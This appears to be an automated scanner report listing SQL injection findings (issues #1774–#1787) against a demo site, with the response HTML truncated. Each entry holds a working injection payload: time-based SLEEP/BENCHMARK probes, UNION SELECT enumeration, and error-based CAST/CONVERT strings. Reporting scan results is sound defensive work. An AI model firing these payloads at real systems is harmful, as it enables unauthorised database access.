[(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1774\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1775\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||\nCHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE \n0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(\n113)) AS NUMERIC)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1776\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ,(select * from (select(sleep(10)))a)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1777\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/\nhead/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> \nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start \nof Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> \n</script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <\nlink rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbW\nFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints\non your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1778\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1779\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14--ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1780\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1781Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1782\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1783\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1784\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1785\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1786\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1787\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5)-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 